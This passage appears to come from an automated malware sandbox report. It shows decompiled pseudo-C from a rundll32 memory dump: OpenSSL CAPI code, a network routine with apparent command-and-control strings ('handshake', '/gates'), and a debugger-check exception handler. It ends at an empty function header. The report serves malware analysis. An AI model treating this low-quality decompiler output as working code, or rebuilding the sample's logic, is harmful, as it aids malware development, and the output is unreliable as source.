                                        • String ID: ($..\..\openssl-1.1.0f\engines\e_capi.c$Called CAPI_dsa_do_sign()
                                        • API String ID: 471198081-186588307
                                        • Opcode ID: 3b5b73225221eb9b2d2b786f7a0e173a429617eed4c9d19b9ee9ad9dba4f9985
                                        • Instruction ID: ad1c3e58861a6c0028433a7964b062afd170346459b85c423f53c6040d6cc2fc
                                        • Opcode Fuzzy Hash: 3b5b73225221eb9b2d2b786f7a0e173a429617eed4c9d19b9ee9ad9dba4f9985
                                        • Instruction Fuzzy Hash: F6A1E132B552C08AFB11DBB19414FED3BB1B759748F04A017EEA957B87DA28C744CB22
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33872E0B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 114encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 17%
                                        			E000001C31C33872E0B0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, long long __r14) {
				void* __rbp;
				int _t30;
				int _t31;
				signed long long _t68;
				signed long long _t69;
				long long _t74;
				char* _t87;
				void* _t90;
				signed long long _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				E000001C31C33880C220();
				_t97 = _t96 - __rax;
				_t95 = _t97 + 0x30;
				 *((long long*)(_t95 + 0x20)) = __rbx;
				 *((long long*)(_t95 + 0x28)) = __rsi;
				 *((long long*)(_t95 + 0x30)) = __rdi;
				 *((long long*)(_t95 + 0x38)) = __r14;
				_t68 =  *0x38903000; // 0x9bfaf736ae76
				_t69 = _t68 ^ _t95;
				 *(_t95 + 8) = _t69;
				r14d = r8d;
				r9d = r8d;
				_t93 = __rdx;
				_t90 = __rcx;
				E000001C31C33872D790(_t69, "capi_ctx_set_provname, name=%s, type=%d\n", __rdx, __r9);
				if (r9d == 0) goto 0x3872e1a0;
				r9d = r9d | 0xffffffff;
				 *((intOrPtr*)(_t97 + 0x28)) = 0;
				 *(_t97 + 0x20) = _t69;
				_t30 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t30 == 0) goto 0x3872e1f5;
				_t9 = __rcx + __rcx + 0xf; // 0xf
				if (_t9 - __rcx + __rcx > 0) goto 0x3872e146;
				E000001C31C33880C220();
				_t98 = _t97 - 0xfffffff0;
				r9d = r9d | 0xffffffff;
				 *(_t98 + 0x28) = _t30;
				_t74 = _t98 + 0x30;
				 *((long long*)(_t98 + 0x20)) = _t74;
				_t31 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t74 == 0) goto 0x3872e1f5;
				r9d = r14d;
				 *((intOrPtr*)(_t98 + 0x20)) = 0xf0000000;
				__imp__CryptAcquireContextW();
				if (_t31 == 0) goto 0x3872e1f5;
				__imp__CryptReleaseContext();
				r8d = 0x665;
				_t87 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				_t81 = __rdx;
				E000001C31C338725150(0xffffffffffffff0, __rdx);
				if (0xfffffff0 != 0) goto 0x3872e232;
				if ( *0x38909020 != 0) goto 0x3872e1d2;
				 *0x38909020 = E000001C31C338721CE0(0xffffffffffffff0);
				 *((intOrPtr*)(_t98 + 0x20)) = 0x667;
				_t15 = _t87 - 0x25; // 0x41
				r8d = _t15;
				E000001C31C3387222D0(_t34, 0x66,  *0x38909020, 0xffffffffffffff0, 0xfffffff0, _t81, _t87, _t93, _t95, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0x3872e255;
				if ( *0x38909020 != 0) goto 0x3872e20a;
				 *0x38909020 = E000001C31C338721CE0(0xffffffffffffff0);
				 *((intOrPtr*)(_t98 + 0x20)) = 0x65f;
				_t17 = _t87 + 1; // 0x67
				r8d = _t17;
				E000001C31C3387222D0(_t38, 0x66,  *0x38909020, 0xffffffffffffff0, 0xfffffff0, _t81, _t87, _t93, _t95, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33872DA10( *0x38909020, 0xffffffffffffff0, _t87);
				goto 0x3872e255;
				r8d = 0x66a;
				E000001C31C338725750();
				 *((long long*)(_t90 + 0x18)) = 0xfffffff0;
				 *(_t90 + 0x20) = r14d;
				E000001C31C33880C290();
				return 1;
			}















                                        0x1c33872e0b7
                                        0x1c33872e0bc
                                        0x1c33872e0bf
                                        0x1c33872e0c4
                                        0x1c33872e0c8
                                        0x1c33872e0cc
                                        0x1c33872e0d0
                                        0x1c33872e0d4
                                        0x1c33872e0db
                                        0x1c33872e0de
                                        0x1c33872e0e5
                                        0x1c33872e0e8
                                        0x1c33872e0eb
                                        0x1c33872e0f1
                                        0x1c33872e0fb
                                        0x1c33872e102
                                        0x1c33872e10a
                                        0x1c33872e10e
                                        0x1c33872e117
                                        0x1c33872e11e
                                        0x1c33872e128
                                        0x1c33872e133
                                        0x1c33872e13a
                                        0x1c33872e14a
                                        0x1c33872e14f
                                        0x1c33872e152
                                        0x1c33872e15b
                                        0x1c33872e15f
                                        0x1c33872e166
                                        0x1c33872e16b
                                        0x1c33872e174
                                        0x1c33872e176
                                        0x1c33872e179
                                        0x1c33872e18a
                                        0x1c33872e192
                                        0x1c33872e19a
                                        0x1c33872e1a0
                                        0x1c33872e1a6
                                        0x1c33872e1ad
                                        0x1c33872e1b0
                                        0x1c33872e1bb
                                        0x1c33872e1c5
                                        0x1c33872e1cc
                                        0x1c33872e1d7
                                        0x1c33872e1e8
                                        0x1c33872e1e8
                                        0x1c33872e1ec
                                        0x1c33872e1f3
                                        0x1c33872e1fd
                                        0x1c33872e204
                                        0x1c33872e20f
                                        0x1c33872e220
                                        0x1c33872e220
                                        0x1c33872e224
                                        0x1c33872e229
                                        0x1c33872e230
                                        0x1c33872e23d
                                        0x1c33872e243
                                        0x1c33872e24d
                                        0x1c33872e251
                                        0x1c33872e25c
                                        0x1c33872e276

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharContextCryptMultiWide$AcquireRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_ctx_set_provname, name=%s, type=%d
                                        • API String ID: 1602880654-1008237481
                                        • Opcode ID: 489dec11606b053378e929e3cfb55b2170a78e91299c8e507d15e3af6d8c4ddb
                                        • Instruction ID: 3e6f7e434e2b9fda4d9ab51a66508d2ff51c537e5bcc8f14e7be44b704cc786f
                                        • Opcode Fuzzy Hash: 489dec11606b053378e929e3cfb55b2170a78e91299c8e507d15e3af6d8c4ddb
                                        • Instruction Fuzzy Hash: BB518D72390BC096FB60DF61D844BC927A6F748794F44A227AA3A87BD5DF39C7508701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386F5CD0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 387networkCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 40%
                                        			E000001C31C3386F5CD0(void* __ebx, signed char __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __rbx, long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, signed char _a8, intOrPtr* _a40) {
				void* _v24;
				char _v312;
				char _v584;
				char _v592;
				char _v736;
				char _v1008;
				char _v1016;
				char _v1160;
				char _v1232;
				char _v1304;
				char _v1544;
				char _v1648;
				char _v1656;
				char _v1688;
				char _v1736;
				char _v1832;
				char _v1856;
				char _v1880;
				char _v1904;
				char _v1936;
				long long _v1944;
				long long _v1952;
				char _v1976;
				long long _v1984;
				long long _v1992;
				char _v2008;
				void* _v2024;
				char _v2040;
				long long _v2056;
				long long _v2064;
				long long _v2072;
				long long _v2080;
				long long _v2088;
				long long _v2096;
				long long _v2104;
				long long _v2112;
				long long _v2120;
				signed long long _v2128;
				long long _v2136;
				void* _v2168;
				long long _v2176;
				long long _v2184;
				char _v2200;
				char _v2224;
				long long _v2232;
				char _v2240;
				long long _v2248;
				long long _v2256;
				long long _v2264;
				long long _v2272;
				long long _v2280;
				long long _v2296;
				long long _v2304;
				long long _v2312;
				char _v2328;
				intOrPtr _v2332;
				intOrPtr _v2336;
				long long _v2344;
				long long _v2352;
				long long _v2360;
				long long _v2368;
				long long _v2376;
				char _v2384;
				long long _v2392;
				long long _v2400;
				long long _v2408;
				char _v2416;
				char _v2424;
				long long _v2440;
				char _v2448;
				void* _v2456;
				long long _v2464;
				char _v2472;
				char _v2484;
				intOrPtr _v2488;
				void* __rdi;
				void* __r14;
				void* _t178;
				void* _t182;
				long long _t183;
				void* _t200;
				signed int _t201;
				signed int _t202;
				char _t215;
				void* _t217;
				void* _t219;
				void* _t231;
				void* _t232;
				signed char _t234;
				void* _t235;
				void* _t243;
				long long _t269;
				long long _t271;
				long long _t281;
				long long _t284;
				long long _t286;
				long long _t290;
				long long _t293;
				intOrPtr* _t294;
				void* _t301;
				long long _t344;
				void* _t345;
				long long _t353;
				intOrPtr* _t371;
				long long _t382;
				void* _t383;
				signed long long _t384;
				signed long long _t385;
				long long _t388;
				long long _t392;
				char* _t397;
				void* _t415;
				void* _t417;
				void* _t418;
				long long _t420;

				_t395 = __r8;
				_t391 = __rbp;
				_t358 = __rdx;
				_t244 = __esi;
				_t243 = __edi;
				_t235 = __edx;
				_t234 = __ecx;
				_t232 = __ebx;
				_t269 = _t392;
				 *((long long*)(_t269 + 8)) = __rcx;
				 *((long long*)(_t269 - 0x800)) = 0xfffffffe;
				 *((long long*)(_t269 + 0x10)) = __rbx;
				 *((long long*)(_t269 + 0x18)) = __rsi;
				_t418 = __r9;
				_t301 = __r8;
				_t384 = __rdx;
				_t388 = __rcx;
				r15d = 0;
				_v2488 = r15d;
				 *((long long*)(__rcx + 0x18)) = 0xf;
				 *((long long*)(__rcx + 0x10)) = _t420;
				 *((intOrPtr*)(__rcx)) = r15b;
				_v2488 = 1;
				E000001C31C3386EFE70(__esi, _t269, __r8, _t269 - 0x8b0, __rdx, __rcx, __rbp, _t420, _t417);
				_t178 = E000001C31C3386F50D0(_t234, _t235, _t269, _t301,  &_v1936, _t358);
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x140], xmm0");
				E000001C31C338701C60(_t178,  &_v2200, _t358, _t395, __r9);
				E000001C31C3386EE9E0(_t301, _v2224,  &_v2200, E000001C31C338701C90,  &_v2224);
				_v2248 = _t269;
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x118], xmm0");
				r8d = _a8 & 0x000000ff;
				E000001C31C3386F9B20(__edi, _t301,  &_v2240);
				_t397 =  &_v1936;
				_t182 = E000001C31C3386F9C30(_t232, _t269,  &_v1656,  &_v2224, _t391, _t397);
				if ( *((long long*)(_t384 + 0x18)) - 0x10 < 0) goto 0x386f5dd0;
				goto 0x386f5dd3;
				r8d = 0;
				_t22 = _t397 + 0x37; // 0x37
				E000001C31C3387DD4D0();
				if (_t182 != 0) goto 0x386f5e40;
				_t183 = E000001C31C338721AE0(_t269);
				E000001C31C3386F4EB0(_v1544,  &_v2224);
				_v2280 = _t183;
				_v2272 = _t269;
				asm("movaps xmm0, [esp+0xf0]");
				asm("movdqa [esp+0x1e0], xmm0");
				E000001C31C3386EE330(_t301,  &_v1304,  &_v2040, _t383);
				E000001C31C3388103EC(_t301,  &_v1304, 0x388e4670, _t388);
				E000001C31C3386F69D0( &_v1976);
				_v1992 =  &_v1856;
				_t271 =  &_v1904;
				_v1984 = _t271;
				E000001C31C3386F66C0(_t271,  &_v1856);
				_t302 = _t271;
				E000001C31C3386F6700(_t271,  &_v1976,  &_v1904, _t388);
				E000001C31C3386F9CF0(__edi, _t271,  &_v1880,  &_v1648, _t271, _t271);
				E000001C31C3386F2B00(__edi, _t271,  &_v1880);
				_v2448 = r15d;
				E000001C31C33880D880( &_v1880,  &_v1648);
				_v2440 = _t271;
				_v2484 = r15d;
				E000001C31C3386FA5F0(_t22, __edi, _t244, _t271, _t302,  &_v1648,  &_v1544, _t384, _t388,  &_v2484,  &_v2448);
				if (_v2448 == 0) goto 0x386f5f0d;
				E000001C31C3386EE680("handshake");
				_v2184 = "/gates";
				_v2176 = 6;
				asm("movaps xmm0, [esp+0x150]");
				asm("movdqa [esp+0x1f0], xmm0");
				r9d = 0xb;
				E000001C31C3386F9FB0(_t302,  &_v1832, "handshake", _t388);
				E000001C31C3386FA080("/gates",  &_v1160, _t384);
				E000001C31C3386F94F0();
				_v1952 =  &_v1016;
				if (_v1016 == 0) goto 0x386f5fc1;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008))))();
				_v1016 = 0;
				E000001C31C3387161F0(_t183, _t244, _t302,  &_v1688, _t384,  &_v1160,  &_v2448, _t415);
				E000001C31C3386FA080( *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008)),  &_v736,  *((intOrPtr*)( *((intOrPtr*)(_v1008 + 4)) +  &_v1008)));
				E000001C31C3386F94F0();
				_v1944 =  &_v592;
				if (_v592 == 0) goto 0x386f6040;
				_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v584 + 4)) +  &_v584))))();
				_v592 = 0;
				_t201 = E000001C31C3386E6100(_t200, _t234,  &_v1688);
				_t371 = _a40;
				_t281 =  *((intOrPtr*)(_t371 + 0x10));
				if (_t281 == 0) goto 0x386f60ba;
				_v2120 = _t281;
				if ( *((long long*)(_t371 + 0x18)) - 0x10 < 0) goto 0x386f6070;
				r8d = _t201;
				_t202 = E000001C31C3386E1080( &_v312,  *_t371);
				_v2112 =  *((intOrPtr*)(_t418 + 0x10));
				if ( *((long long*)(_t418 + 0x18)) - 0x10 < 0) goto 0x386f6099;
				goto 0x386f609c;
				r8d = _t202;
				E000001C31C3386E1290(E000001C31C3386E1400( *((long long*)(_t418 + 0x18)) - 0x10,  &_v312, _t418),  &_v312);
				_t385 = _t384 | 0xffffffff;
				if ( &_v1736 == _t418) goto 0x386f60e1;
				r8d = 0;
				E000001C31C3386E6530(_t302,  &_v1736, _t418, _t385, _t388,  &_v736, _t385);
				E000001C31C3386F9E70( &_v1832);
				E000001C31C3386FA0E0(_t302,  &_v1656,  &_v1832, _t385, _t388);
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x160], xmm0");
				asm("xorps xmm1, xmm1");
				asm("movdqu [esp+0x170], xmm1");
				_v2136 = _t420;
				_v2128 = _t385;
				_t284 =  &_v2424;
				_v2104 = _t284;
				_v2416 = _t284;
				_v2408 = _t284;
				_v2400 = _t284;
				_v2392 = _t284;
				_v2416 = _t420;
				_v2408 =  &_v2416;
				_t286 =  &_v2416;
				_v2400 = _t286;
				_v2392 = r15d;
				_v2424 = _t420;
				_v2384 = _t286;
				_v2376 = _t286;
				_v2384 =  &_v2384;
				_v2376 =  &_v2384;
				_v2368 = _t420;
				_v2360 = _t420;
				_v2352 = _t420;
				_v2344 = _t420;
				_v2336 = 0xb;
				_v2332 = 0xc8;
				_v2096 =  &_v2328;
				_v2312 = _t420;
				_v2304 = _t420;
				_v2304 = 0xf;
				_v2312 = _t420;
				_v2328 = 0;
				E000001C31C3386FA220(_t302,  &_v1656,  &_v2168, _t385, _t388,  &_v2424, _t418);
				_t290 =  &_v2328;
				if (_t388 == _t290) goto 0x386f6258;
				r8d = 0;
				E000001C31C3386E6530(_t302, _t388,  &_v2328, _t385, _t388,  &_v2424, _t385);
				_v2472 = r15d;
				E000001C31C33880D880(_t388,  &_v2328);
				_v2464 = _t290;
				E000001C31C3386FA380(0, _t243, _t244, _t388 - _t290, _t290, _t302,  &_v1648,  &_v1544, _t385, _t388,  &_v2424,  &_v2472);
				E000001C31C3386EE810( &_v1648,  &_v1544);
				_v2088 = _t290;
				_v2264 = 2;
				_v2256 = _t290;
				asm("movaps xmm0, [esp+0x100]");
				asm("movdqa [esp+0x330], xmm0");
				_t215 = _v2472;
				if (_v2464 != _t290) goto 0x386f62c2;
				if (_t215 == 2) goto 0x386f62fe;
				if (_t215 == 0) goto 0x386f62fe;
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x200], xmm0");
				E000001C31C3386EE330(_t302,  &_v1232,  &_v2008);
				_t217 = E000001C31C3388103EC(_t302,  &_v1232, 0x388e4670, _t388);
				_v2080 =  &_v2328;
				E000001C31C3386E6100(_t217, _t234,  &_v2328);
				_t219 = E000001C31C3386F9470(_t302,  &_v2424);
				_t344 = _v2168;
				if (_t344 == 0) goto 0x386f63ac;
				_t293 = _v2136 - _t344;
				_v2072 = _t293;
				_v2296 = _t344;
				if (_t293 - 0x1000 < 0) goto 0x386f63a6;
				if ((_t234 & 0x0000001f) == 0) goto 0x386f6361;
				0x38811be8();
				_t294 = _t344 - 8;
				_v2064 = _t294;
				_t382 =  *_t294;
				_v2056 = _t382;
				if (_t382 - _t344 < 0) goto 0x386f6382;
				0x38811be8();
				_t345 = _t344 - _t382;
				if (_t345 - 8 >= 0) goto 0x386f6390;
				0x38811be8();
				if (_t345 - 0x27 <= 0) goto 0x386f639b;
				0x38811be8();
				_v2296 = _t382;
				0x3880ba8c();
				_v2264 =  &_v1736;
				E000001C31C3386E6100(_t219, _t234,  &_v1736);
				E000001C31C3386F9470(_t302,  &_v1832);
				E000001C31C3386F5BD0(_t243, _t302,  &_v1976);
				E000001C31C3386F5710(_t345 - 0x27, _t302,  &_v1544, _t388,  &_v2472);
				_v2280 =  &_v1648;
				E000001C31C3386F8910(_t243, _t302,  &_v1648);
				E000001C31C3386F6E60(_t243, _t302,  &_v2240,  &_v2424);
				_t353 = _v2232;
				if (_t353 == 0) goto 0x386f6463;
				_v2456 = _t353;
				asm("lock xadd [ecx+0x8], eax");
				if (_t243 != 1) goto 0x386f6463;
				 *((intOrPtr*)( *_v2456))();
				asm("lock xadd [ebx+0xc], eax");
				if (_t243 != 1) goto 0x386f6463;
				 *((intOrPtr*)( *_v2456 + 8))();
				E000001C31C3386F51A0(_t243,  *_v2456, _v2456,  &_v1936);
				asm("lock xadd [0x2151b7], edi");
				if (_t243 != 1) goto 0x386f6485;
				__imp__#116();
				_t231 = E000001C31C3386EED90(_v2456,  &_v2224, _t388);
				return _t231;
			}






















































































































                                        0x1c3386f5cd0
                                        0x1c3386f5cd0
                                        0x1c3386f5cd0
                                        0x1c3386f5cd0
                                        0x1c3386f5cd0
                                        0x1c3386f5cd0
                                        0x1c3386f5cd0
                                        0x1c3386f5cd0
                                        0x1c3386f5cd0
                                        0x1c3386f5cd3
                                        0x1c3386f5ce3
                                        0x1c3386f5cee
                                        0x1c3386f5cf2
                                        0x1c3386f5cf6
                                        0x1c3386f5cf9
                                        0x1c3386f5cfc
                                        0x1c3386f5cff
                                        0x1c3386f5d02
                                        0x1c3386f5d05
                                        0x1c3386f5d0a
                                        0x1c3386f5d12
                                        0x1c3386f5d16
                                        0x1c3386f5d19
                                        0x1c3386f5d28
                                        0x1c3386f5d36
                                        0x1c3386f5d3c
                                        0x1c3386f5d3f
                                        0x1c3386f5d52
                                        0x1c3386f5d76
                                        0x1c3386f5d7b
                                        0x1c3386f5d83
                                        0x1c3386f5d86
                                        0x1c3386f5d8f
                                        0x1c3386f5da0
                                        0x1c3386f5da6
                                        0x1c3386f5dbe
                                        0x1c3386f5dc9
                                        0x1c3386f5dce
                                        0x1c3386f5dd3
                                        0x1c3386f5dd6
                                        0x1c3386f5de2
                                        0x1c3386f5de9
                                        0x1c3386f5deb
                                        0x1c3386f5df2
                                        0x1c3386f5df7
                                        0x1c3386f5dfe
                                        0x1c3386f5e06
                                        0x1c3386f5e0e
                                        0x1c3386f5e27
                                        0x1c3386f5e3b
                                        0x1c3386f5e4e
                                        0x1c3386f5e5c
                                        0x1c3386f5e64
                                        0x1c3386f5e6c
                                        0x1c3386f5e7c
                                        0x1c3386f5e81
                                        0x1c3386f5e94
                                        0x1c3386f5eb0
                                        0x1c3386f5ebd
                                        0x1c3386f5ec2
                                        0x1c3386f5ec7
                                        0x1c3386f5ecc
                                        0x1c3386f5ed1
                                        0x1c3386f5ef0
                                        0x1c3386f5efa
                                        0x1c3386f5f08
                                        0x1c3386f5f14
                                        0x1c3386f5f1c
                                        0x1c3386f5f28
                                        0x1c3386f5f30
                                        0x1c3386f5f39
                                        0x1c3386f5f4f
                                        0x1c3386f5f60
                                        0x1c3386f5f7b
                                        0x1c3386f5f89
                                        0x1c3386f5f99
                                        0x1c3386f5fb7
                                        0x1c3386f5fb9
                                        0x1c3386f5fce
                                        0x1c3386f5fdf
                                        0x1c3386f5ffa
                                        0x1c3386f6008
                                        0x1c3386f6018
                                        0x1c3386f6036
                                        0x1c3386f6038
                                        0x1c3386f6048
                                        0x1c3386f604d
                                        0x1c3386f6055
                                        0x1c3386f605c
                                        0x1c3386f605e
                                        0x1c3386f606b
                                        0x1c3386f6070
                                        0x1c3386f607b
                                        0x1c3386f6085
                                        0x1c3386f6092
                                        0x1c3386f6097
                                        0x1c3386f609c
                                        0x1c3386f60b5
                                        0x1c3386f60c2
                                        0x1c3386f60c9
                                        0x1c3386f60ce
                                        0x1c3386f60dc
                                        0x1c3386f60e9
                                        0x1c3386f60fe
                                        0x1c3386f6103
                                        0x1c3386f6106
                                        0x1c3386f610f
                                        0x1c3386f6112
                                        0x1c3386f611b
                                        0x1c3386f6123
                                        0x1c3386f612b
                                        0x1c3386f6130
                                        0x1c3386f613a
                                        0x1c3386f613f
                                        0x1c3386f6144
                                        0x1c3386f6149
                                        0x1c3386f6151
                                        0x1c3386f615b
                                        0x1c3386f6160
                                        0x1c3386f6165
                                        0x1c3386f616a
                                        0x1c3386f6172
                                        0x1c3386f6179
                                        0x1c3386f6181
                                        0x1c3386f6191
                                        0x1c3386f61a1
                                        0x1c3386f61a9
                                        0x1c3386f61b1
                                        0x1c3386f61b9
                                        0x1c3386f61c1
                                        0x1c3386f61c9
                                        0x1c3386f61d4
                                        0x1c3386f61e7
                                        0x1c3386f61ef
                                        0x1c3386f61f7
                                        0x1c3386f61ff
                                        0x1c3386f620b
                                        0x1c3386f6213
                                        0x1c3386f6230
                                        0x1c3386f6235
                                        0x1c3386f6240
                                        0x1c3386f6245
                                        0x1c3386f6253
                                        0x1c3386f6258
                                        0x1c3386f625d
                                        0x1c3386f6262
                                        0x1c3386f627c
                                        0x1c3386f6281
                                        0x1c3386f6286
                                        0x1c3386f628e
                                        0x1c3386f6299
                                        0x1c3386f62a1
                                        0x1c3386f62a9
                                        0x1c3386f62b7
                                        0x1c3386f62bb
                                        0x1c3386f62c0
                                        0x1c3386f62c4
                                        0x1c3386f62c6
                                        0x1c3386f62cb
                                        0x1c3386f62e4
                                        0x1c3386f62f8
                                        0x1c3386f6306
                                        0x1c3386f6316
                                        0x1c3386f6321
                                        0x1c3386f6327
                                        0x1c3386f6332
                                        0x1c3386f633c
                                        0x1c3386f633f
                                        0x1c3386f6347
                                        0x1c3386f6355
                                        0x1c3386f635a
                                        0x1c3386f635c
                                        0x1c3386f6361
                                        0x1c3386f6365
                                        0x1c3386f636d
                                        0x1c3386f6370
                                        0x1c3386f637b
                                        0x1c3386f637d
                                        0x1c3386f6382
                                        0x1c3386f6389
                                        0x1c3386f638b
                                        0x1c3386f6394
                                        0x1c3386f6396
                                        0x1c3386f639e
                                        0x1c3386f63a6
                                        0x1c3386f63b4
                                        0x1c3386f63c4
                                        0x1c3386f63d2
                                        0x1c3386f63e0
                                        0x1c3386f63ee
                                        0x1c3386f63fc
                                        0x1c3386f640c
                                        0x1c3386f641a
                                        0x1c3386f6420
                                        0x1c3386f642b
                                        0x1c3386f642d
                                        0x1c3386f6434
                                        0x1c3386f643c
                                        0x1c3386f6449
                                        0x1c3386f644d
                                        0x1c3386f6455
                                        0x1c3386f645f
                                        0x1c3386f646b
                                        0x1c3386f6471
                                        0x1c3386f647c
                                        0x1c3386f647e
                                        0x1c3386f648d
                                        0x1c3386f64b8

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterExceptionLeaveThrow$CleanupStartup
                                        • String ID: /gates$handshake
                                        • API String ID: 1678628239-1467732948
                                        • Opcode ID: 0fe2b578b2385013cf4177be4bbabe4990dcb6d63d38493867b3cc39af894b51
                                        • Instruction ID: e40e6d27c49a037ac3e115b0a3c023c0ef03963ed5403ff0e1cddd0c37fa9d6e
                                        • Opcode Fuzzy Hash: 0fe2b578b2385013cf4177be4bbabe4990dcb6d63d38493867b3cc39af894b51
                                        • Instruction Fuzzy Hash: E7126A32259BC491EA71DB14E484BDEB3A4F7C4744F50A226DBDD43AAAEF38C644CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3388119BC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E000001C31C3388119BC(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t43;
				void* _t44;
				intOrPtr _t52;
				signed long long _t62;
				long long _t65;
				_Unknown_base(*)()* _t85;
				void* _t89;
				void* _t90;
				void* _t92;
				signed long long _t93;
				struct _EXCEPTION_POINTERS* _t99;

				_t45 = __ecx;
				 *((long long*)(_t92 + 0x10)) = __rbx;
				 *((long long*)(_t92 + 0x18)) = __rsi;
				_t90 = _t92 - 0x4f0;
				_t93 = _t92 - 0x5f0;
				_t62 =  *0x38903000; // 0x9bfaf736ae76
				 *(_t90 + 0x4e0) = _t62 ^ _t93;
				_t52 = r8d;
				_t44 = __ecx;
				if (__ecx == 0xffffffff) goto 0x388119fb;
				E000001C31C33880C834(_t36);
				r8d = 0x98;
				E000001C31C33880E410(__ecx, 0, _t52, __esp, _t93 + 0x70, __rdx, _t85, __r8);
				r8d = 0x4d0;
				E000001C31C33880E410(_t45, 0, _t52, __esp, _t90 + 0x10, __rdx, _t85, __r8);
				 *((long long*)(_t93 + 0x48)) = _t93 + 0x70;
				_t65 = _t90 + 0x10;
				 *((long long*)(_t93 + 0x50)) = _t65;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t65 == 0) goto 0x38811a8e;
				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
				 *((long long*)(_t93 + 0x30)) = _t93 + 0x60;
				 *((long long*)(_t93 + 0x28)) = _t93 + 0x58;
				 *((long long*)(_t93 + 0x20)) = _t90 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
				 *((long long*)(_t90 + 0xa8)) = _t90 + 0x510;
				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
				 *((intOrPtr*)(_t93 + 0x74)) = _t52;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t85, _t89);
				if (UnhandledExceptionFilter(_t99) != 0) goto 0x38811af0;
				if (_t40 != 0) goto 0x38811af0;
				if (_t44 == 0xffffffff) goto 0x38811af0;
				_t43 = E000001C31C33880C834(_t42);
				E000001C31C33880C290();
				return _t43;
			}

















                                        0x1c3388119bc
                                        0x1c3388119bc
                                        0x1c3388119c1
                                        0x1c3388119ca
                                        0x1c3388119d2
                                        0x1c3388119d9
                                        0x1c3388119e3
                                        0x1c3388119ea
                                        0x1c3388119ef
                                        0x1c3388119f4
                                        0x1c3388119f6
                                        0x1c338811a02
                                        0x1c338811a08
                                        0x1c338811a13
                                        0x1c338811a19
                                        0x1c338811a23
                                        0x1c338811a2c
                                        0x1c338811a30
                                        0x1c338811a35
                                        0x1c338811a4a
                                        0x1c338811a4d
                                        0x1c338811a56
                                        0x1c338811a58
                                        0x1c338811a6b
                                        0x1c338811a78
                                        0x1c338811a81
                                        0x1c338811a88
                                        0x1c338811a95
                                        0x1c338811aa7
                                        0x1c338811aab
                                        0x1c338811ab9
                                        0x1c338811abd
                                        0x1c338811ac1
                                        0x1c338811acb
                                        0x1c338811ade
                                        0x1c338811ae2
                                        0x1c338811ae7
                                        0x1c338811aeb
                                        0x1c338811afa
                                        0x1c338811b16

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                        • String ID:
                                        • API String ID: 1239891234-0
                                        • Opcode ID: bb594284fa3fc0d750bf4eb0282b7eb08e519545bf601487c94571a1f072b000
                                        • Instruction ID: 2fd20105a5a069441d13e0d00dc9dbc4962b0cc913627ed6adc39a838f357251
                                        • Opcode Fuzzy Hash: bb594284fa3fc0d750bf4eb0282b7eb08e519545bf601487c94571a1f072b000
                                        • Instruction Fuzzy Hash: B3315C36254FC096EB608F25E8407DE77A0F788754F505126EEAD4BB99DF38C645CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338730790 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 153COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 45%
